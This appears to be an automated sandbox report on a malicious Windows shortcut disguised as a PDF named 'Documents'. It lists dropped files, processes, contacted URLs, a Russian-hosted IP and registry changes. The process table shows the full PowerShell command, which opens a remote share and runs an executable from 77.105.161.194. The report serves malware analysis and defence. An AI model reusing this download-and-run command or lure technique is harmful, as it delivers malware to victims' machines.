Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
#U0414#U043e#U043a#U0443#U043c#U0435#U043d#U0442#U0438.pdf.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has command line arguments, Icon number=0, Archive,
ctime=Thu Aug 29 13:52:48 2024, mtime=Wed Oct 9 19:25:36 2024, atime=Thu Aug 29 13:52:48 2024, length=455680, window=hide
|
initial sample
|
||
C:\ProgramData\Microsoft\Network\Downloader\edb.chk
|
data
|
dropped
|
||
C:\ProgramData\Microsoft\Network\Downloader\edb.log
|
data
|
dropped
|
||
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
|
Extensible storage engine DataBase, version 0x620, checksum 0x0e76ae96, page size 16384, Windows version 10.0
|
dropped
|
||
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000002e.db
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000002f.db
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Windows[4].json
|
JSON data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0kmzpyjj.rqd.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qv2hncff.ltq.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\S501F3OZP0M9B4UFR4QB.temp
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d868607cb8559f7.customDestinations-ms (copy)
|
data
|
dropped
|
||
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
|
JSON data
|
dropped
|
There are 4 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "explorer '\\77.105.161.194@80\file\'"; Start-Sleep -Seconds
1; Stop-Process -Name explorer; \\77.105.161.194@80\file\6706e721f2c06.exe
|
||
C:\Windows\explorer.exe
|
"C:\Windows\explorer.exe" \\77.105.161.194@80\file\
|
||
C:\Windows\explorer.exe
|
explorer.exe
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
|
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
https://api.msn.com/v1/news/Feed/Windows?
|
unknown
|
||
http://schemas.mi
|
unknown
|
||
https://api.msn.com/1$1
|
unknown
|
||
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
|
unknown
|
||
http://77.105.161.194/%
|
unknown
|
||
https://api.msn.com:443/v1/news/Feed/Windows?
|
unknown
|
||
https://g.live.com/odclientsettings/ProdV2.C:
|
unknown
|
||
https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
|
unknown
|
||
https://excel.office.com
|
unknown
|
||
http://77.105.161.194/)
|
unknown
|
||
https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
|
unknown
|
||
https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
|
unknown
|
||
https://aka.ms/odirm
|
unknown
|
||
https://g.live.com/odclientsettings/Prod.C:
|
unknown
|
||
https://g.live.com/odclientsettings/ProdV2
|
unknown
|
||
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
|
unknown
|
||
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
|
unknown
|
||
https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
|
unknown
|
||
https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
|
unknown
|
||
https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
|
unknown
|
||
https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
|
unknown
|
||
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
|
unknown
|
||
https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
|
unknown
|
||
https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
|
unknown
|
||
http://77.105.161.194/
|
unknown
|
||
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
|
unknown
|
||
https://powerpoint.office.come
|
unknown
|
||
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
|
unknown
|
||
https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
|
unknown
|
||
http://77.105.161.194:80/
|
unknown
|
||
https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
|
unknown
|
||
http://crl.ver)
|
unknown
|
||
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
|
unknown
|
||
http://77.105.161.194/i
|
unknown
|
||
http://schemas.micr
|
unknown
|
||
https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
|
unknown
|
||
https://outlook.com
|
unknown
|
||
https://aka.ms/Vh5j3k
|
unknown
|
||
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
|
unknown
|
||
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
|
unknown
|
||
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
|
unknown
|
||
https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
|
unknown
|
||
https://www.rd.com/list/polite-habits-campers-dislike/
|
unknown
|
||
https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
|
unknown
|
||
https://api.msn.com/
|
unknown
|
||
https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
|
unknown
|
||
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
|
unknown
|
||
https://www.msn.com:443/en-us/feed
|
unknown
|
||
https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
|
unknown
|
||
https://word.office.com(
|
unknown
|
||
https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
|
unknown
|
||
https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
|
unknown
|
There are 42 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
api.msn.com
|
unknown
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
77.105.161.194
|
unknown
|
Russian Federation
|
||
127.0.0.1
|
unknown
|
unknown
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.WindowsStore_8wekyb3d8bbwe\ApplicationFrame\Microsoft.WindowsStore_8wekyb3d8bbwe!App
|
PreferredMinSize
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
Classes
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
~reserved~
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.zip\OpenWithProgids
|
Unpacker
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\CD Burning\StagingInfo\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}
|
DriveNumber
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\CD Burning\Drives\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\Current
Media
|
TotalBytes
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\CD Burning\Drives\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\Current
Media
|
FreeBytes
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\CD Burning\Drives\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\Current
Media
|
Blank Disc
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\CD Burning\Drives\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\Current
Media
|
Can Close
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\CD Burning\Drives\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\Current
Media
|
Media Type
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\CD Burning\Drives\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\Current
Media
|
Imapi Media State
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\CD Burning\Drives\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\Current
Media
|
IsImapiDataBurnSupported
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\CD Burning\Drives\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\Current
Media
|
IsImapiEraseSupported
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\CD Burning\Drives\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\Current
Media
|
Live FS
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\CD Burning\Drives\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\Current
Media
|
Disc Label
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\CD Burning\Drives\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\Current
Media
|
Set
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
Classes
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
~reserved~
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
|
{33154C99-BF49-443D-A73C-303A23ABBE97} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
Classes
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
~reserved~
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\StorageSense\Parameters\BackupReminder
|
BackupReminderToastCount
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\DiskSpaceChecking
|
LastInstallTimeLowStorageNotify
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\StorageSense\Parameters\BackupReminder
|
LastTimeBackupReminderNotify
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
Classes
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
~reserved~
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
Classes
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
~reserved~
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
Classes
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
~reserved~
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
Classes
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
~reserved~
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
Classes
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
~reserved~
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
Classes
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
~reserved~
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
Classes
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
~reserved~
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
Classes
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
~reserved~
|
||
HKEY_CURRENT_USER_Classes\Local Settings\MuiCache\24\417C44EB
|
@explorerframe.dll,-13137
|
||
HKEY_CURRENT_USER_Classes\Local Settings\MuiCache\24\417C44EB
|
@explorerframe.dll,-13138
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
Classes
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
~reserved~
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
Classes
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
~reserved~
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
Classes
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
~reserved~
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
Classes
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
~reserved~
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
Classes
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
~reserved~
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
Classes
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
~reserved~
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
Classes
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
~reserved~
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
Classes
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
~reserved~
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
Classes
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
~reserved~
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
Classes
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
~reserved~
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
Classes
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
~reserved~
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
Classes
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
~reserved~
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
Classes
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
~reserved~
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
|
{5985FC23-2588-4D9A-B38B-7E7AFFAB3155} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
Classes
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
~reserved~
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
Classes
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
~reserved~
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
Classes
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
~reserved~
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
|
{A38B883C-1682-497E-97B0-0A3A9E801682} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
Classes
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
~reserved~
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
Classes
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
~reserved~
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
Classes
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
~reserved~
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
Classes
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
~reserved~
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
Classes
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
~reserved~
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
Classes
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
~reserved~
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
Classes
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
|
~reserved~
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{ad6cc5d8-f1a9-4873-be33-91b2f05e9306}
|
Generation
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Search
|
TraySearchBoxVisible
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Search
|
SearchboxWidthOld
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Search
|
SearchboxWidth
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Search
|
TraySearchBoxVisible
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Search
|
SearchboxWidthOld
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Search
|
SearchboxWidth
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Search
|
InstalledWin32AppsRevision
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Shell\Bags\1\Desktop
|
IconLayouts
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Shell\Bags\1\Desktop
|
IconLayouts
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:0000000000010404
|
VirtualDesktop
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:0000000000020400
|
VirtualDesktop
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:00000000000203FA
|
VirtualDesktop
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:0000000000020402
|
VirtualDesktop
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:00000000000203F6
|
VirtualDesktop
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:00000000000903EC
|
VirtualDesktop
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:00000000000203E4
|
VirtualDesktop
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:00000000000103E2
|
VirtualDesktop
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:00000000000103E6
|
VirtualDesktop
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:00000000000303CA
|
VirtualDesktop
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:00000000000103D0
|
VirtualDesktop
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:00000000000203C6
|
VirtualDesktop
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:00000000000103CE
|
VirtualDesktop
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:00000000000103C2
|
VirtualDesktop
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:0000000000010380
|
VirtualDesktop
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:0000000000010350
|
VirtualDesktop
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:0000000000010348
|
VirtualDesktop
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:0000000000040340
|
VirtualDesktop
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:00000000000602F0
|
VirtualDesktop
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:0000000000020344
|
VirtualDesktop
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:00000000000C0228
|
VirtualDesktop
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:0000000000090038
|
VirtualDesktop
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:0000000000070210
|
VirtualDesktop
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:000000000004028C
|
VirtualDesktop
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Search
|
InstalledWin32AppsRevision
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.3g2\OpenWithProgids
|
WMP11.AssocFile.3G2
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.3gp\OpenWithProgids
|
WMP11.AssocFile.3GP
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.3gp2\OpenWithProgids
|
WMP11.AssocFile.3G2
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.3gpp\OpenWithProgids
|
WMP11.AssocFile.3GP
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.aac\OpenWithProgids
|
WMP11.AssocFile.ADTS
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.adt\OpenWithProgids
|
WMP11.AssocFile.ADTS
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.adts\OpenWithProgids
|
WMP11.AssocFile.ADTS
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.aif\OpenWithProgids
|
WMP11.AssocFile.AIFF
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.aifc\OpenWithProgids
|
WMP11.AssocFile.AIFF
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.aiff\OpenWithProgids
|
WMP11.AssocFile.AIFF
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.asf\OpenWithProgids
|
WMP11.AssocFile.ASF
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.asx\OpenWithProgids
|
WMP11.AssocFile.ASX
|
||
